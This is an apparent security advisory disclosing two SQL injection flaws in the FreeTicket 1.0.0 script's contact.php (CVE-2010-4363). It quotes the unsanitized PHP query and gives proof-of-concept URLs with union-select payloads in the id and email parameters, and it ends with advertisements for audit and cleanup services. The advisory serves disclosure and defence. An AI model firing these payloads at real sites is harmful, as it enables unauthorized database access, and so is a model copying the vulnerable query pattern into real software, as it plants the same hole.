SQL injections in FreeTicket

Summary

Vulnerability
SQL injections in FreeTicket
Discovered
2010.11.14
Last Update
n/a n/a
ID
EV0146
CVE
CVE-2010-4363
Risk Level
medium
Type
SQL injection
Status
Unpatched. Vendor notified. No reply from developer(s)
Vendor
Mrcgiguy (http://www.mrcgiguy.com/)
Vulnerable Software
FreeTicket
Version
1.0.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL injection found in FreeTicket script.

'id' SQL injection
Vulnerability found in contact.php script. User-defined variable id is not properly sanitized before being used in SQL query. This can be used to execute arbitrary SQL query
'email' SQL injection
Vulnerable script is contact.php script. email parameter is not properly sanitized before being used in SQL query.

PoC/Exploit

Vulnerable code.

There is no SQL injection filter is used:
$email = $_POST["email"]; $id = $_POST["id"];
if (!$id) {$id = $_GET[id];} if (!$email) {$email = $_GET[email];}
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");

'id' SQL injection example.

The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*

'email' SQL injection example.

PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*

Condition.

magic_quotes_gpc = off

Solution.

Solution for "SQL injections in FreeTicket" is not available. Check Mrcgiguy website for updates.

Order Source Code Audit made by eVuln

Prevent attacks by source code analysis of your site done by Aliaksandr Hartsuyeu.The order will be done by experts in web security.

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>